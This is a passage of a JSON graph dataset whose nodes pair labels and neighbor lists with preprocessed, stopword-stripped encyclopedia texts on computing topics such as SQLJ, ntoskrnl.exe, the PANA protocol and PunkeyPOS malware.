      5793,
      7842,
      7844,
      7852,
      7853,
      7858,
      9911,
      3769,
      9913,
      7869,
      5823,
      1728,
      7877,
      9932,
      1741,
      1744,
      5840,
      5845,
      9947,
      5854,
      9952,
      9955,
      5862,
      7911,
      5867,
      1772,
      3820,
      7916,
      9964,
      1776,
      1788,
      7936,
      9984,
      1798,
      3846,
      3848,
      1801,
      1818,
      10016,
      10023,
      1832,
      3882,
      3883,
      3886,
      7983,
      1841,
      5939,
      3892,
      7988,
      5942,
      1849,
      5948,
      10044,
      7998,
      7999,
      8003,
      10053,
      3911,
      8007,
      1866,
      1869,
      3919,
      1872,
      1891,
      8035,
      8036,
      3943,
      3945,
      10089,
      5995,
      3950,
      1903,
      6001,
      6006,
      10104,
      10109,
      8066,
      3977,
      8080,
      8083,
      6036,
      8090,
      1952,
      4003,
      1958,
      8109,
      1967,
      4017,
      8115,
      4024,
      8120,
      8125,
      4030,
      8126,
      1985,
      10178,
      8136,
      6090,
      8143,
      10199,
      2015,
      2023,
      4078,
      4082,
      6130,
      8180,
      8184,
      2042,
      10237
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1777,
    "label": 7,
    "text": "Fedena:fedena fedena open-source school management software developed ruby rails framework web 2.0 web application developed foradian technologies fedena cloud based school erp software used schools administration purposes fedena used education department government kerala automate system process 15,000 schools state named sampoorna fedena used 40,000 institutions world development support fedena foradian mit tr35 2012 india award innovation education domain fedena pro commercial version software comes add-on modules premium modules open source version fedena seen updates since version 2.3 2013 developed ruby rails framework mvc architecture application composed basic module satisfies necessary requirements simple sis fedena optimized customization many add-on modules installed easily extend power usability fedena currently integrated moodle google apps tally fedena supports multitenant architecture used manage group institutions fedena started development june 2009 currently version 3.5.3 released march 2017 fedena project owned foradian technologies internet engineering company based bangalore india company raised 2 million funding william bissell managing director fabindia april 2014 foradian initiated successfully implemented fedena state kerala government schools project named sampoorna project implemented coordination education department government kerala india automate system process 15,000 schools state thank",
    "neighbors": [
      7980,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 1778,
    "label": 3,
    "text": "Haitz's_law:haitz law haitz law observation forecast steady improvement many years light-emitting diodes leds claims every decade cost per lumen unit useful light emitted falls factor 10 amount light generated per led package increases factor 20 given wavelength color light considered led counterpart moore law states number transistors given integrated circuit doubles every 18 24 months laws rely process optimization production semiconductor devices haitz law named roland haitz 1935–2015 scientist agilent technologies among others first presented larger public strategies light 2000 first series annual conferences organized strategies unlimited besides forecast exponential development cost per lumen amount light per package publication also forecast luminous efficacy led-based lighting could reach 200 lm/w lumen per watt 2020 crossing 100 lm/w 2010 would case enough industrial government resources spent research led-lighting 50 electricity consumption lighting 20 totally consumed electrical energy would saved reaching 200 lm/w prospect stepping-stone applications leds e.g mobile phone flash lcd-backlighting led massive investment led-research led efficacy indeed cross 100 lm/w 2010 trend continues leds become efficient light source 2020 theoretical maximum continuous wavelength opposed one made combination discrete-wavelength sources white light source 5800k colour temperature wavelengths restricted visible band 400nm 700nm 251 lm/w however non-continuous wavelength composite white leds achieved efficacies 300 lm/w 2010 cree inc. developed marketed xm-l led claimed 1000 lumens 100 lm/w efficacy 160 lm/w 350 150 lm/w 700 also claimed broken 200 lm/w barrier r prototype producing 208 lm 350 may 2011 cree announced another prototype 231 lm/w efficacy 350 march 2014 cree announced another prototype record breaking 303 lm/w efficacy 350 2017 philips lighting started offering consumer led lights 200 lm/w efficacy dubai using filament technology full 3 years haitz law predicted",
    "neighbors": [
      6656,
      2273,
      5798,
      5802,
      78,
      8367,
      785,
      6801,
      153,
      7006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1779,
    "label": 4,
    "text": "Protocol_for_Carrying_Authentication_for_Network_Access:protocol carrying authentication network access pana protocol carrying authentication network access ip-based protocol allows device authenticate network granted access pana define new authentication protocol key distribution key agreement key derivation protocols purposes extensible authentication protocol eap used pana carry eap payload pana allows dynamic service provider selection supports various authentication methods suitable roaming users independent link layer mechanisms pana internet engineering task force ietf protocol described rfc 5191 pac pana client pac client part protocol element located node wants reach access network paa pana authentication agent entity represents server part pana protocol main task message exchange pac authenticating authorizing network access addition scenarios paa entity message exchange aaa server order offer pac credentials case eap configured pass-through aaa server placed physically different place paa authentication server element contains information needed check pac credentials node receives pac credentials paa sends packet result credential checking process moreover result ok packet contains information access parameters bandwidth allowed ip configuration session paa pac established session session time expires needs re-authentication process order get network access pac ep enforcement point works filter packets source authenticated pac basically ep network node drops packets according parameters provided results authentication processes typically function applied communication device access point router authentication process done successfully key installed ep pac establishing session ep pac session n't expire pac access network services authorised session expires indicate situation paa order re-authentication",
    "neighbors": [
      6904,
      2996
    ],
    "mask": "Test"
  },
  {
    "node_id": 1780,
    "label": 1,
    "text": "SQLJ:sqlj sqlj deprecated working title efforts combine java sql common effort started around 1997 engineers ibm oracle compaq informix sybase cloudscape sun microsystems consists three parts 0 1 2 part 0 describes embedding sql statements java programs sqlj part 0 basis part 10 standard aka sql object language bindings sql/olb sqlj parts 1 2 describes converse possibility use java classes routines types sql statements parts 1 2 basis part 13 sql standard sql routines types using java programming language sql/jrt sqlj commonly used refer sqlj part 0 usually contrasted means embedding sql java like jdbc part 0 updated jdbc 2.0 compatibility ratified iso 2000 last two parts combined submitted iso part 2 substantially rewritten iso submission ansi version formal enough specification closer style user manual combined version ratified 2002 sqlj part 0 specification largely originated oracle also provided first reference implementation following sqlj synonym sqlj part 0 whereas jdbc provides api sqlj consists language extension thus programs containing sqlj must run preprocessor sqlj translator compiled advantages sqlj jdbc include following examples compare sqlj syntax jdbc usage",
    "neighbors": [
      9665,
      2596,
      8262,
      5896,
      6860,
      5677,
      10413,
      5872,
      3323,
      8188
    ],
    "mask": "Test"
  },
  {
    "node_id": 1781,
    "label": 4,
    "text": "PunkeyPOS_Malware:punkeypos malware punkeypos new type point sale malware recently discovered pandalabs new point sale malware infects point sale pos systems two types malware applications keylogger ram scraper punkeypos gets installed computer automatically without knowledge user similar manner pos malware keylogger captures records keystrokes made pos terminals retail stores captures data related credit cards ram scraper reads memory system processes pos terminals information magnetic strips cards gets stored pos terminal/ device memory stolen information encrypted forwarded cybercriminal ’ control command server c c reported pandalabs 200 retail stores use pos systems infected new variant punkeypos malware",
    "neighbors": [
      10309,
      202,
      6091,
      4945,
      8978,
      4471,
      6360
    ],
    "mask": "Train"
  },
  {
    "node_id": 1782,
    "label": 2,
    "text": "Tomsrtbt:tomsrtbt tomsrtbt pronounced tom root boot small linux distribution short tom floppy root filesystem also bootable author tom oehser touts gnu/linux one floppy disk containing many common linux command-line tools useful system recovery linux operating systems also features drivers many types hardware network connectivity could created within linux earlier versions windows running ms-dos mode either formatting standard 1.44mb floppy disk higher density 1.722mb disk writing tomsrtbt image disk burning bootable cd capable reading writing filesystems many operating systems era including ext2/ext3 used linux fat used dos windows ntfs used windows nt 2000 xp minix used minix operating system windows nt later versions windows including 2000 xp vista create tomsrtbt floppy floppy driver allow extended format utilities tomsrtbt written lua programming language many use busybox space saving compiler options used throughout kernel patched support loading image compressed bzip2 many cases older alternate versions programs selected due smaller size",
    "neighbors": [
      516,
      8837,
      7435,
      10127,
      8976,
      2193,
      2321,
      2197,
      5397,
      2199,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      237,
      7534,
      2671,
      7920,
      8177,
      9074,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1783,
    "label": 1,
    "text": "Mathematics_Genealogy_Project:mathematics genealogy project mathematics genealogy project web-based database academic genealogy mathematicians 13 february 2019 contained information 238,725 mathematical scientists contributed research-level mathematics typical mathematician project entry includes graduation year thesis title alma mater doctoral advisor doctoral students project grew founder harry coonce desire know name advisor advisor coonce professor mathematics minnesota state university mankato time project founding project went online fall 1997 coonce retired mankato 1999 fall 2002 university decided would longer support project project relocated time north dakota state university since 2003 project also operated auspices american mathematical society 2005 received grant clay mathematics institute harry coonce assisted mitchel t. keller assistant professor washington lee university keller currently managing director project mathematics genealogy mission statement states throughout project use word mathematics mathematician mean word inclusive sense thus relevant data statistics computer science philosophy operations research welcome genealogy information obtained sources dissertation abstracts international notices american mathematical society may supplied anyone via project website searchable database contains name mathematician university awarded degree year degree awarded title dissertation names advisor second advisor flag country degree awarded listing doctoral students count academic descendants historically significant figures lacked doctoral degree listed notably joseph louis lagrange noted data collected mathematics genealogy project self-reported guarantee observed genealogy network complete description mentorship network fact 16,147 mathematicians recorded mentor 8,336 recorded proteges maimgren ottino amaral 2010 stated mathematicians graduated 1900 1960 believe graduation mentorship record reliable",
    "neighbors": [
      6662,
      10246,
      10762,
      6673,
      2595,
      5676,
      3119,
      2608,
      9271,
      11328,
      70,
      9288,
      588,
      589,
      9294,
      9298,
      1114,
      7775,
      9825,
      9315,
      9845,
      5248,
      7808,
      10881,
      4749,
      144,
      3728,
      1180,
      4769,
      6306,
      9895,
      9384,
      3252,
      3774,
      4799,
      4800,
      5310,
      11473,
      1236,
      1749,
      726,
      5852,
      10981,
      4839,
      1768,
      2283,
      2798,
      3823,
      4846,
      9969,
      9975,
      1785,
      11005,
      4867,
      11020,
      269,
      2832,
      9492,
      1815,
      795,
      294,
      1830,
      4392,
      4395,
      9522,
      311,
      6967,
      5946,
      6460,
      9535,
      10049,
      2885,
      3408,
      5456,
      2901,
      5464,
      5977,
      1883,
      8031,
      1392,
      8562,
      1397,
      7542,
      5496,
      10617,
      4474,
      2427,
      4483,
      7048,
      3468,
      397,
      10638,
      1936,
      7069,
      11679,
      6052,
      9644,
      10668,
      6578,
      3529,
      8656,
      2518,
      8155,
      4578,
      5097,
      5611,
      3060,
      9718,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 1784,
    "label": 3,
    "text": "Peter_Hofstee:peter hofstee harm peter hofstee born 1962 dutch physicist computer scientist currently distinguished research staff member ibm austin usa part-time professor big data systems delft university technology netherlands hofstee best known contributions heterogeneous computing chief architect synergistic processor elements cell broadband engine processor used sony playstation 3 first supercomputer reach sustained petaflop operation returning ibm research 2011 focused optimizing system roadmap big data analytics cloud including use accelerated compute early research work coherently attached reconfigurable acceleration power7 paved way new coherent attach processor interface power8 hofstee ibm master inventor 100 issued patents hofstee born groningen obtained master degree theoretical physics university groningen 1988 continued study california institute technology wrote master thesis constructing distributed programs 1991 obtained ph.d. thesis titled synchronizing processes 1995 joined caltech lecturer two years moved ibm austin texas research laboratory staff member senior technical staff member distinguished engineer positions since 2011 peter leading big data system design work ibm march 2016 peter appointed professor chair big data computer systems faculty electrical engineering mathematics computer science delft university technology",
    "neighbors": [
      9472,
      643,
      1309,
      9126,
      6311,
      4017,
      306,
      7218,
      6072,
      8120,
      1985,
      3025,
      6738,
      342,
      1115,
      859,
      3677,
      4060,
      9445,
      8937,
      10985,
      4587,
      6004,
      2293,
      3323,
      6268,
      6909
    ],
    "mask": "Test"
  },
  {
    "node_id": 1785,
    "label": 2,
    "text": "Niels_Provos:niels provos niels provos researcher security engineering malware cryptography received phd computer science university michigan 2003 2018 worked google distinguished engineer security google cloud platform 2018 left google join stripe new head security many years provos contributed openbsd operating system developed bcrypt adaptive cryptographic hash function author numerous software packages including libevent event driven programming system systrace access control system honeyd honeypot system stegdetect steganography detector bcrypt password encryption technique many others provos outspoken critic effect dmca similar laws security researchers arguing threaten make criminals people conducting legitimate security research provos also served program chair usenix security symposium program committees network distributed system security symposium acm sigcomm numerous conferences served board directors usenix 2006 2010 provos hobbies include swordsmithing forged swords japanese viking styles routinely posts videos blacksmithing activities online",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      1932,
      3984,
      274,
      7702,
      4503,
      8344,
      6702,
      7983,
      9520,
      1843,
      2245,
      1993,
      8778,
      3404,
      11086,
      5970,
      7515,
      5084,
      7139,
      1637,
      4071,
      6888,
      5230,
      1783,
      10105,
      8954,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1786,
    "label": 3,
    "text": "Solbourne_Computer:solbourne computer solbourne computer inc. originally vendor computer systems based longmont colorado united states first 52 owned matsushita late 1980s early 1990s company produced range computer workstations servers based sparc microprocessor architecture largely compatible sun microsystems sun-4 systems notable supporting symmetric multiprocessing time sun produced multiprocessor systems even sun produced multiprocessor systems sunos uses asymmetric multiprocessing model rather os/mp symmetric multiprocessing model sun would adopt symmetric multiprocessing release solaris 2.0 1992 due cost engineering producing new systems compete sun increasingly competitive hardware offerings loss symmetric multiprocessing distinguishing feature 1994 solbourne left computer hardware business grumman systems support corporation taking support solbourne customers 2000 1994 walt pounds assumed role ceo solbourne solbourne headquarters moved boulder colorado point july 2008 solbourne focused providing consulting services solutions based oracle applications associated technologies solbourne established strong reputation oracle e-business suite community become dominant provider consulting services state local oracle e-business suite customers july 11 2008 solbourne closed transaction sell substantially company assets deloitte consulting solbourne management team 100 professionals joined deloitte ’ enterprise applications technology integration human capital service areas solbourne range comprises following solbourne systems run os/mp modified version sunos 4.1 supporting multiprocessor systems final release os/mp 4.1d corresponding sunos 4.1.3. work done porting openbsd solbourne idt workstations",
    "neighbors": [
      9665,
      10436,
      2895,
      1399,
      9438
    ],
    "mask": "Test"
  },
  {
    "node_id": 1787,
    "label": 3,
    "text": "Flappy:flappy flappy first appeared sharp x1 home computer 1983 debut soon followed conversions number popular japanese computers early 1980s including nec line pcs fujitsu fm series ports msx computer line family computer released 1985. db-soft produced sequel difficult puzzles called king flappy benefit anyone managed clear original 200 levels sides game calls nintendo game boy port released exclusively japan 1990 published victor musical industries beautiful planet blue star home-planet young boy named flappy invaded dark emperor ngalo-ngolo proud inhabitants blue star wanting neither war invasion self-destruct along planet path self-determination flappy however boarded onto escape capsule headed neighboring planet seviras father survives capsule sees fragments exploded blue star rain incessantly planet seviras wandering aimlesslessly planet seviras flappy reaches oasis suddenly hears voice sky saying 'gather fragments blue star blue stones blue area gathered ... flappy believing miracle occurred begins journey gather blue stones gravity gaps floors wandering enemies stand way flappy reaching goal flappy pick throw sleeping mushrooms enemies knock drop stones crush permanently however many obstacles along way brick walls must work way around brown stones crush also crush fall holes dead angles blue stone becomes irretrievable falls moving enemies game features two enemies unicorns ebira unicorns green creatures move mostly-repetitive horizontal patterns ebira red crab-like enemies word ebi japanese term shellfish relentlessly chase flappy horizontally vertically ebira tend mimic flappy movements flappy must careful avoid charged persistent ebira floppy beyond floppy clones apple ii",
    "neighbors": [
      9006,
      9137,
      7622
    ],
    "mask": "None"
  },
  {
    "node_id": 1788,
    "label": 3,
    "text": "MicroSPARC:microsparc microsparc code-named tsunami microprocessor implementing sparc v8 instruction set architecture isa developed sun microsystems low-end microprocessor intended low-end workstations embedded systems microprocessor developed sun floating-point unit fpu licensed meiko scientific contained 800,000 transistors two derivatives microsparc microsparc-ii microsparc-iiep microsparc-iiep 100 mhz microsparc-ii integrated pci controller embedded systems developed fabricated lsi logic sun microprocessor used sun javastation network computer",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      1818,
      8863,
      1707,
      2731,
      10926,
      3247,
      11440,
      8625,
      6322,
      1461,
      4664,
      4285,
      6464,
      7104,
      9665,
      2895,
      3919,
      597,
      2269,
      9955,
      7270,
      11626,
      878,
      5358,
      1776,
      11636,
      1399,
      5375
    ],
    "mask": "None"
  },
  {
    "node_id": 1789,
    "label": 4,
    "text": "Fluentd:fluentd fluentd cross platform open-source data collection software project originally developed treasure data written primarily ruby programming language fluentd big data tool semi- un-structured data sets like apache kafka analyzes event logs application logs clickstreams according suonsyrjä mikkonen core idea fluentd unifying layer different types log inputs outputs fluentd available linux mac osx windows fluentd created sadayuki furuhashi project mountain view-based firm treasure data written primarily ruby source code released open-source software october 2011 company announced 5 million funding 2013 fluentd one data collection tools recommended amazon web services 2013 said similar apache flume scribe google cloud platform bigquery recommends fluentd default real-time data-ingestion tool uses google customized version fluentd called google-fluentd default logging agent",
    "neighbors": [
      961,
      3269,
      7983,
      7248,
      564,
      11221,
      823,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 1790,
    "label": 2,
    "text": "Panos_(operating_system):panos operating system panos discontinued computer operating system developed acorn computers 1980s released 1985 ran 32016 second processor bbc micro acorn cambridge workstation systems essentially architecture based 32-bit ns32016 cpu acw bbc micro-based i/o processor access i/o processor ns32016 firmware kernel called pandora panos ran ns32016 rudimentary single-user operating system written modula-2 provided simple command line interpreter text editor access dfs adfs nfs file systems via i/o processor targeted academic scientific user community came bundled compilers fortran 77 c pascal lisp programming languages following list commands supported panos command line interpreter",
    "neighbors": [
      9762,
      6502,
      4679,
      7847,
      8262,
      3722,
      8524,
      10862,
      7983,
      1750,
      11033,
      1849,
      9978,
      5435,
      2045,
      6558,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 1791,
    "label": 3,
    "text": "Ntoskrnl.exe:ntoskrnl.exe computing ntoskrnl.exe short windows nt operating system kernel executable also known kernel image provides kernel executive layers microsoft windows nt kernel space responsible various system services hardware abstraction process memory management thus making fundamental part system contains cache manager executive kernel security reference monitor memory manager scheduler dispatcher system binary native application linked codice_1 instead containing standard 'start entry point its-own function calls architecture-independent kernel initialization function ntoskrnl.exe linked codice_1 linked codice_3 codice_4 codice_5 requires static copy c runtime objects depends executable usually 2mb size overall four kernel image files revision windows two kernel image files windows system multiprocessor uniprocessor files selected install time pae non-pae files selected boot.ini bcd option according routines ntoskrnl use prefixes names indicate component ntoskrnl defined following table lists kernel receives control gets pointer structure parameter structure passed bootloader contains information hardware path registry file kernel parameters containing boot preferences options change behavior kernel path files loaded bootloader codice_6 registry hive nls character encoding conversion vga font definition structure retrieved using kernel debugger downloading microsoft symbol database x86 architecture kernel receives system already protected mode gdt idt tss ready since know address one load one one fill pcr structure main entry point ntoskrnl.exe performs system dependent initialization calls system independent initialization enters idle loop modern operating systems use interrupts instead i/o port polling wait information devices x86 architecture interrupts handled interrupt dispatch table idt device triggers interrupt interrupt flag flags register set processor hardware looks interrupt handler table entry corresponding interrupt number turn translated irq pic chips modern hardwares apic interrupt handlers usually save subset state registers handling restore back original values done interrupt table contains handlers hardware interrupts software interrupts exceptions ia-32 versions kernel one example software interrupt handler many idt table entry 2e hexadecimal 46 decimal used assembly language codice_7 system calls real implementation entry points internal subroutine named per symbol information published microsoft codice_8 newer versions different mechanisms making use codice_9 instruction x86-64 codice_10 instruction used instead one notable feature nt interrupt handling interrupts usually conditionally masked based priority called irql instead disabling irqs via interrupt flag permits various kernel components carry critical operations without necessarily blocking services peripherals devices microsoft windows divides virtual address space two regions lower part starting zero instantiated separately process accessible user kernel mode application programs run processes supply code runs user mode upper part accessible kernel mode exceptions instantiated system-wide ntoskrnl.exe mapped region several kernel mode components region also contains data used kernel mode code kernel mode heaps file system cache entire physical memory ram address range broken many small usually 4 kb blocks properties block stored structures called page table entries managed os accessed processor hardware page tables organized tree structure physical page number top-level table stored control register 3 cr3 windows registry repository configuration settings information operating system software applications thought filesystem optimized small files however accessed file system-like semantics rather specialized set apis implemented kernel mode exposed user mode registry stored disk several different files called hives one system hive loaded early boot sequence provides configuration information required time additional registry hives providing software-specific user-specific data loaded later phases system initialization user login respectively list drivers loaded disk retrieved codice_11 key current control set key codice_6 registry hive key stores device drivers kernel processes user processes collectively called services stored mixed place initialization upon driver load request kernel transverses tree looking services tagged kernel services",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      3620,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      602,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      5234,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      7317,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      9911,
      10428,
      2749,
      2244,
      8391,
      200,
      3272,
      9420,
      2782,
      3294,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      5356,
      5358,
      10993,
      3834,
      8959,
      11519,
      5380,
      6924,
      3856,
      8976,
      3351,
      8473,
      8985,
      11546,
      8988,
      2339,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      4423,
      5457,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      7039,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6087,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      477,
      478,
      6114,
      6115,
      6637,
      9709,
      6128,
      6641,
      3573,
      2042
    ],
    "mask": "Test"
  },
  {
    "node_id": 1792,
    "label": 4,
    "text": "Context-based_access_control:context-based access control context-based access control cbac feature firewall software intelligently filters tcp udp packets based application layer protocol session information used intranets extranets internets cbac configured permit specified tcp udp traffic firewall connection initiated within network needing protection words cbac inspect traffic sessions originate external network however example discusses inspecting traffic sessions originate external network cbac inspect traffic sessions originate either side firewall basic function stateful inspection firewall without cbac traffic filtering limited access list implementations examine packets network layer transport layer however cbac examines network layer transport layer information also examines application-layer protocol information ftp connection information learn state tcp udp session allows support protocols involve multiple channels created result negotiations ftp control channel multimedia protocols well protocols ftp rpc sql*net involve multiple control channels cbac inspects traffic travels firewall discover manage state information tcp udp sessions state information used create temporary openings firewall access lists allow return traffic additional data connections permissible sessions sessions originated within protected internal network cbac deep packet inspection hence termed ios firewall cbac also provides following benefits",
    "neighbors": [
      4480,
      2049,
      2563,
      8838,
      6797,
      8210,
      1172,
      11413,
      9496,
      3482,
      1436,
      4511,
      3616,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      10924,
      4912,
      8753,
      10417,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      7364,
      5573,
      2118,
      11073,
      4814,
      9423,
      10574,
      7121,
      210,
      4435,
      10451,
      10580,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      7260,
      5860,
      3942,
      9958,
      10987,
      8943,
      8816,
      9971,
      245,
      10872,
      1273,
      9983
    ],
    "mask": "Train"
  },
  {
    "node_id": 1793,
    "label": 5,
    "text": "ALCAP:alcap control plane protocol transport layer 3rd generation umts networks called alcap access link control application part alcap defined 3gpp equivalent itu recommendation q.2630.2 basic functionality alcap multiplexing different users onto one aal2 transmission path using channel ids cids used umts access network utran along atm ipbcp use ip links core network alcap makes possible 248 channels multiplexed onto one aal2 bearer access link control application part alcap alcap protocol used control plane transport layer umts charge managing multiplexing users atm aal2 virtual connections alcap specified iub iur iu circuit switched domain interfaces protocol used interfaces atm-based itu-t q.2630.2 standard aal type 2 signalling protocol capability set 2 chosen alcap protocol history iub iur interfaces alcap specified 3gpp ts 25.426 iu interface alcap specified 3gpp ts 25.414 protocol dependencies",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1794,
    "label": 8,
    "text": "Dark_social_media:dark social media dark social media dark social dark traffic social shares contain digital referral information source idea generally used web analytics well online advertising contrary sharing social networking service like facebook done publicly dark social done privately irc channels emails sms simply copy-and-paste ways private sharing confuse deep web dark social media content traffic online sharing sharing activities often come name direct typed/bookmarked similar form today web analytic services 2014 believed dark social consisted 69 sharing activities globally whereas facebook holds 23 however exact nature dark social media still unknown word dark name suggests unknown can't-see heart concept like dark energy astronomy alexis madrigal curious traffic really coming site worked atlantic grew time web built knew ways share information big name sites like facebook lead believe large portion web traffic coming “ bookmarked ” “ typed ” sources led believe help web analytics firm chartbeat able quantify traffic something much meaningful article wrote brought usage term dark social dark social also known direct social dark traffic however alexis madrigal ’ term dark social widely used dark social media perceived differently looking desktop computers vs mobile computers 2014 almost 50 total external mobile traffic dark social traffic meaning traffic referrer showing coming contrast one-third external desktop traffic dark social 2014 two years alexis madrigal wrote original post dark social started notice dark social traffic could come mobile devices well madrigal mentioned since october 2015 facebook changed algorithm mobile app resulted media publisher receiving 100 traffic meantime also noticed atlantic company used work received lot dark social traffic facebook mobile traffic alexis madrigal later performed experiment confirm theory dark social traffic boost indeed facebook mobile app found referrer links facebook ’ mobile app ’ always pass destination website creates dark social traffic mobile devices updated charbeat report also confirmed part dark social traffic generated facebook mobile app users addition facebook mobile app dark social traffic also come reddit mobile app gmail instant messaging apps well one radiumone ’ report published february 2016 dark side mobile sharing company stated found 84 online traffic coming dark social channels date furthermore also showed dark social traffic 62 mobile devices 38 desktops rise smart phones mobile apps largely increased dark social traffic mobile devices last years amount dark social traffic mobile devices jumps 53 2014 62 2016 dark social traffic comes desktops decreases 47 2014 38 2016 dark social traffic consists mostly one-to-one messaging non-dark channels facebook messenger snapchat rather commonly used one-to-many methods example sharing twitter feed facebook wall traditional analytics tools rely upon links shared private messaging methods may include referral tags analytics tool simply appear though came direct traffic could include referral tags copy pasted another non-dark social channel referral tags always carried private messaging becomes impossible tell person sharing dark traffic originally obtained content another referral method directly copy-pasting link makes difficult marketers understand effective social media marketing strategy make changes accordingly combat lack transparency websites include attractive ways share links simply copy-pasting another application example sites implement highly visible share buttons copy-paste button buttons share link referral tag directly dark social channel like whatsapp facebook messenger email rules also made within traditional analytics tools filter dark social traffic include direct links exclude n't referred homepage analytics tools also beginning incorporate ability distinguish dark social copy-paste based traffic types traffic invisible web also known deep web dark social referring web traffic analyzed invisible web referring websites data indexed search engines essence kinds information invisible general population internet dark social data found web analytics software see traffic originates invisible web data show using search engines like google search microsoft bing hidden results unintentional dark web associated dark social invisible web mainly hidden nature dark web data data intentionally hidden internet involved wish remain anonymous interest shares content share psychology dark social sharing found people share three reasons dark social sharing allows individualism people able freely express choosing what- whom- share rather broadcasting everything “ friends. ” dark social sharing creates “ personal ” channel sharing elevates builds personal relationships even defying geographical boundaries dark social sharing allows people feel helpful trend interesting sharing smaller intimate social circle sharer gets knowledgeable within groups giving street cred email im common sources dark social sharing facebook may actually part cause increase dark social-through chatting messaging services sources dark social reddit stumbleupon twitter tumblr linkedin google+ whatsapp viber kwik firechat om livetext evidence pew research age accounts sharing darkly sharing means tracked easier baby boomers born 1946-1964 gen xers born 1965-1981 commonly share email word mouth fact gen xers heaviest users email considered dark social millennials born 1982-1995 younger tend toward social media sharing applications often reported dark addition sharing professionally darkly linkedin requires upwards 15 hours week impact certain platforms also attract types populations blogs lgbt communinty",
    "neighbors": [
      6576,
      5182
    ],
    "mask": "Test"
  },
  {
    "node_id": 1795,
    "label": 2,
    "text": "SUNMOS:sunmos sunmos sandia/unm operating system operating system jointly developed sandia national laboratories computer science department university new mexico goal project started 1991 develop highly portable yet efficient operating system massively parallel-distributed memory systems sunmos uses single-tasking kernel provide demand paging takes control nodes distributed system application loaded running manage available memory node use full resources provided hardware applications started controlled process called yod runs host node yod runs sun frontend ncube 2 service node intel paragon sunmos developed reaction heavy weight version osf/1 ran single-system image paragon consumed 8-12 mb 16 mb available node leaving little memory available compute applications comparison sunmos used 250 kb memory per node additionally overhead osf/1 limited network bandwidth 35 mb/s sunmos able use 170 mb/s peak 200 mb/s available ideas sunmos inspired puma multitasking variant ran i860 paragon among extensions puma portals api scalable high performance message passing api intel ported puma portals pentium pro based asci red system named cougar cray ported cougar opteron based cray xt3 renamed catamount version catamount released public named opencatamount 2009 catamount lightweight kernel selected r 100 award",
    "neighbors": [
      9665,
      6179,
      7432,
      10411,
      7983,
      1168,
      8242,
      118,
      86
    ],
    "mask": "Test"
  },
  {
    "node_id": 1796,
    "label": 2,
    "text": "Network_Utility:network utility network utility application included macos provides variety tools used related computer network information gathering analysis network utility shows information network connections including mac address interface ip addresses assigned speed status count data packets sent received count transmission errors collisions available services tools found network utility examples network utility help network utility uses tools supplied unix directories functions however port scan uses unix executable resources folder stroke found network utility.app/contents/resources/stroke",
    "neighbors": [
      4615,
      8204,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      5492,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10727,
      10221,
      11249,
      5619,
      8692,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 1797,
    "label": 4,
